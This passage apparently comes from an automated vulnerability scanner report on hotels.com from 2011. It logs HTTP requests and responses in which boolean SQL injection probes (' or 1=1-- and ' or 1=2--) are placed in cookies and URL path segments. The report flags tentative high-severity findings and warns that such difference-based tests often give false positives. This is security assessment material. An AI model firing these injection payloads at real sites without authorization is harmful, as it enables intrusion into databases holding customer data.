Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=5823045321059860'%20or%201%3d1--%20; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/xml;charset=UTF-8
Pragma: no-cache
RTSS: 1
Content-Length: 12556
Date: Mon, 03 Oct 2011 00:31:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.1.1.i2%3A103.4.1.i6%3A171.0.0%3A98.6.4%3A142.1.0.i4%3A200.1.0%3A198.0.0%3A190.0.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.3.0.i1%3A132.0.0.i2%3A122.1.0.i3%3A149.0.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:31:02 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjEuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6OTguNi40OjE0Mi4xLjAuaTQ6MjAwLjEuMDoxOTguMC4wOjE5MC4wLjA6MTM0LjAuMToyLjIuMToyMDkuMC4xOjE0Ny4wLjEuaTY6OTIuMy4wLmkxOjEzMi4wLjAuaTI6MTIyLjEuMC5pMzoxNDkuMC4wLmkxfEhDT01fVVMhQSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:31:03 GMT; Path=/

<additional-hotel-data>
<trip-advisor>
<ta-reviews-trigger>
<![CDATA[
<h4 class="property_details_reviews_third_party_title">
TripAdvisor reviews for Omni Parker House</h4>
<div class="property_details_reviews_trip_advisor">
<div class="overall_review clearfix">
<span class="overall">Overall rating:</span>
<span class="tripadvisor_owl_small"></span>
<span class="tripadvisor_rating tripadvisor_rating_40"><span class="bar"></span><span class="sprite"></span></span>
<span class="basedon">
Based on <em>1288</em> traveller reviews</span>
</div>
<h3>Most recent traveller reviews:</h3>
<div class="individual_review">
<span class="tripadvisor_rating tripadvisor_rating_30">
<span class="bar"></span>
<span class="sprite"></span>
</span>
<q class="title">"Amazing location, great lobby, small rooms"</q>
<div class="review_data">
<abbr title="10/01/11" class="date">10/01/11</abbr>
<span class="author">gopher2003</span>
<span class="location">Denver</span>
</div>
<p>
"If you are looking to spend very little time in the room, or you are travling alone and don't mind tight quarters, but location is your priority- this is the place for you. Parker House is on the Freedom Trail, located next to everything h
...[SNIP]...

Request 2

GET /hotel/hoteldata.html?destinationId=1401516&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&validate=false&previousDateful=false&nightlyPrice=289%2CUSD&dateful=true HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=5823045321059860'%20or%201%3d2--%20; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
Expect:
Content-Type: text/xml;charset=UTF-8
Pragma: no-cache
RTSS: 1
Content-Length: 12556
Date: Mon, 03 Oct 2011 00:31:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:31:03 GMT; Path=/

<additional-hotel-data>
<trip-advisor>
<ta-reviews-trigger>
<![CDATA[
<h4 class="property_details_reviews_third_party_title">
TripAdvisor reviews for Omni Parker House</h4>
<div class="property_details_reviews_trip_advisor">
<div class="overall_review clearfix">
<span class="overall">Overall rating:</span>
<span class="tripadvisor_owl_small"></span>
<span class="tripadvisor_rating tripadvisor_rating_40"><span class="bar"></span><span class="sprite"></span></span>
<span class="basedon">
Based on <em>1288</em> traveller reviews</span>
</div>
<h3>Most recent traveller reviews:</h3>
<div class="individual_review">
<span class="tripadvisor_rating tripadvisor_rating_30">
<span class="bar"></span>
<span class="sprite"></span>
</span>
<q class="title">"Amazing location, great lobby, small rooms"</q>
<div class="review_data">
<abbr title="10/01/11" class="date">10/01/11</abbr>
<span class="author">gopher2003</span>
<span class="location">Denver</span>
</div>
<p>
"If you are looking to spend very little time in the room, or you are travling alone and don't mind tight quarters, but location is your priority- this is the place for you. Parker House is on the Freedom Trail, located next to everything historical and mere blocks from three different subway stops. You absolutly can't beat the location. That being said, the room is one of the smallest I've been in. It was clean, tighty and comfy if you don't need a lot of room. Also, its historical so translate that as thin walls."
</p>
</div>
<div class="clear-both"></div>
<div class="individual_review">
<span class="tripadvisor_rating tripadvisor_rating_40">
<span class="bar"></span>
<span class="sprite"></span>
</span>
<q class
...[SNIP]...

1.21. http://www.hotels.com/hoteldetails/urgencypopup.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hoteldetails/urgencypopup.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 16779709'%20or%201%3d1--%20 and 16779709'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hoteldetails/urgencypopup.html16779709'%20or%201%3d1--%20?hotelId=109368 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 404 Not Found
Server: Apache
Expect:
Content-Type: text/html;charset=UTF-8
Cache-Control: private
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:26 GMT
Content-Length: 41824
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjAuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjIwMC4wLjA6MTk4LjIuMDoxOTAuMi4wOjEzNC4wLjE6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjYuMC5pMToxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTQ5LjEuMC5pMXxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:26 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAANPPyC9JzUlJLUnMzCnWLy1KT81LrizILygt0Msoyc0xNDM3tzQ3sFRXNTLILwIShqrGKYa6ukCWPVinZ4ptsp5edn5VuJOrf7hRrq8eAIe7QjZSAAAA&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]>
<!--[if IE]>
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAANPPyC9JzUlJLUnMzCnWLy1KT81LrizILygt0Msoyc0xNDM3tzQ3sFRXNTLILwIShqrGKYa6ukCWPVinZ4ptsp5edn5VuJOrf7hRrq8eAIe7QjZSAAAA&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]-->
</span>
<span>&nbsp;/&nbsp;</span>
<a id="sign_up_header_button" href="https://ssl.hotels.com/profile/signup.html" rel="nofollow"
title="For faster bookings and enhanced services">Create Account</a>
</div>
<ul>
<li>
<a href="https://ssl.hotels.com/profile/summary.html" rel="nofollow"
title="View or edit your account details">
Account</a>
</li>
<li>
<a href="https://ssl.hotels.com/customer_care/bookings.html" rel="nofollow"
title="View or cancel a booking you've already made">
Reservations</a>
</li>
</ul>
</div>
<div class="main_links" role="navigation">
<ul class="main_nav">
<li class="first">
<a class="clickreport " href="http://www.hotels.com/" title="" rel="clickReportc..GO0K0p-rZ07bVQrGQdWikdIdFQlySAI6pZ0OApYg33RWfGOdA61bA-wBSA2wmJ5tO7Mb2DK2cjNZRnUiQucEIQ..">Hotels</a>
</li>
<li class="deals">
<a class="clickreport " href="http://www.hotels.com/deals/" title="" rel="clickReportc..GO0K0p-rZ07bVQrGQdWikfV8l41X81B1pOxSsGx7JlPHtt9ZLXVa91DJ8ST8H1Lxi84a8_hhwLk.">Hotel Deals</a>
</li>
<li class="">
<a class="clickreport " href="http://www.hotels.com/hotel/packages.html" title="" rel="clickReportc..GO0K0p-rZ07bVQrGQdWikdgvi0gfNwOUFOmxtlW1DoVWfGOdA61bA-wBSA2wmJ5tvGPLPCtG0u5xQQ2OuQoko
...[SNIP]...

Request 2

GET /hoteldetails/urgencypopup.html16779709'%20or%201%3d2--%20?hotelId=109368 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Expect:
Content-Type: text/html;charset=UTF-8
Cache-Control: private
RTSS: 1
Content-Length: 41968
Date: Mon, 03 Oct 2011 00:29:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjAuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjIwMC4wLjA6MTk4LjIuMDoxOTAuMi4wOjEzNC4wLjE6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjYuMC5pMToxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTQ5LjEuMC5pMXxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:26 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAANPPyC9JzUlJLUnMzCnWLy1KT81LrizILygt0Msoyc0xNDM3tzQ3sFRXNTLILwIShqrGKUa6ukCWPVinZ4ptsp5edn5VuJOrf7hRrq8eAJ-e43JSAAAA&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]>
<!--[if IE]>
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAANPPyC9JzUlJLUnMzCnWLy1KT81LrizILygt0Msoyc0xNDM3tzQ3sFRXNTLILwIShqrGKUa6ukCWPVinZ4ptsp5edn5VuJOrf7hRrq8eAJ-e43JSAAAA&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]-->
</span>
<span>&nbsp;/&nbsp;</span>
<a id="sign_up_header_button" href="https://ssl.hotels.com/profile/signup.html" rel="nofollow"
title="For faster bookings and enhanced services">Create Account</a>
</div>
<ul>
<li>
<a href="https://ssl.hotels.com/profile/summary.html" rel="nofollow"
title="View or edit your account details">
Account</a>
</li>
<li>
<a href="https://ssl.hotels.com/customer_care/bookings.html" rel="nofollow"
title="View or cancel a booking you've already made">
Reservations</a>
</li>
</ul>
</div>
<div class="main_links" role="navigation">
<ul class="main_nav">
<li class="first">
<a class="clickreport " href="http://www.hotels.com/" title="" rel="clickReportc..GO0K0p-rZ07bVQrGQdWikdIdFQlySAI6pZ0OApYg33RWfGOdA61bA-wBSA2wmJ5tO7Mb2DK2cjNZRnUiQucEIQ..">Hotels</a>
</li>
<li class="deals">
<a class="clickreport " href="http://www.hotels.com/deals/" title="" rel="clickReportc..GO0K0p-rZ07bVQrGQdWikfV8l41X81B1pOxSsGx7JlPHtt9ZLXVa91DJ8ST8H1Lxi84a8_hhwLk.">Hotel Deals</a>
</li>
<li class="">
<a class="clickreport " href="http://www.hotels.com/hotel/packages.html" title="" rel="clickReportc..GO0K0p-rZ07bVQrGQdWikdgvi0gfNwOUFOmxtlW1DoVWfGOdA61bA-wBSA2wmJ5tvGPLPCtG0u5xQQ2OuQoko
...[SNIP]...

1.22. http://www.hotels.com/hoteldetails/urgencypopup.html [mvthistory cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hoteldetails/urgencypopup.html

Issue detail

The mvthistory cookie appears to be vulnerable to SQL injection attacks. The payloads 12592570'%20or%201%3d1--%20 and 12592570'%20or%201%3d2--%20 were each submitted in the mvthistory cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hoteldetails/urgencypopup.html?hotelId=109368 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US12592570'%20or%201%3d1--%20; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Cteonnt-Length: 150
Expect:
Content-Type: text/html;charset=utf-8
Content-Length: 150
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:01 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.1.0%3A130.1.1.i2%3A103.4.1.i6%3A171.1.0%3A48.1.0%3A98.6.4%3A142.0.0.i4%3A200.0.0%3A198.0.0%3A190.2.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.0.0.i1%3A132.2.0.i2%3A122.1.0.i3%3A149.0.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:01 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4xLjA6MTMwLjEuMS5pMjoxMDMuNC4xLmk2OjE3MS4xLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjIwMC4wLjA6MTk4LjAuMDoxOTAuMi4wOjEzNC4wLjE6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjAuMC5pMToxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTQ5LjAuMC5pMXxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8Mg..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:01 GMT; Path=/

<span id="sense_of_urgency_close" class="blue" title="Close popup"></span>
<p>
This hotel has been booked 13 times in the last 24 hours</p>

Request 2

GET /hoteldetails/urgencypopup.html?hotelId=109368 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
